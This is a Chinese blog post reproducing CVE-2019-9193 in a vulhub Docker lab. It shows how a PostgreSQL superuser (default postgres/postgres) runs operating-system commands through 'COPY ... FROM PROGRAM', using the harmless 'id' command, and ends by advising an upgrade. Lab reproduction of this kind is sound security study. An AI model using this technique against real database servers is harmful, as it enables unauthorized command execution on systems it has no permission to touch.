PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现

简介

 

PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。

 

影响版本

9.3-11.2
  
  

 

漏洞概述

 

PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。

 

环境搭建

 

进入目录并启动环境


  
  
  1. cd vulhub-master/postgres/CVE-2019-9193/
  2. docker-compose up -d

环境启动后,将开启Postgres默认的5432端口,默认账号密码为postgres/postgres。

 

漏洞复现

 

首先连接到postgres中

psql --host 192.168.204.136  --username postgres
  
  

执行如下语句,FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中:


  
  
  1. DROP TABLE IF EXISTS cmd_exec;
  2. CREATE TABLE cmd_exec(cmd_output text);
  3. COPY cmd_exec FROM PROGRAM 'id';
  4. SELECT * FROM cmd_exec;

 

成功执行命令

 

修复建议

 

升级到安全版本

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值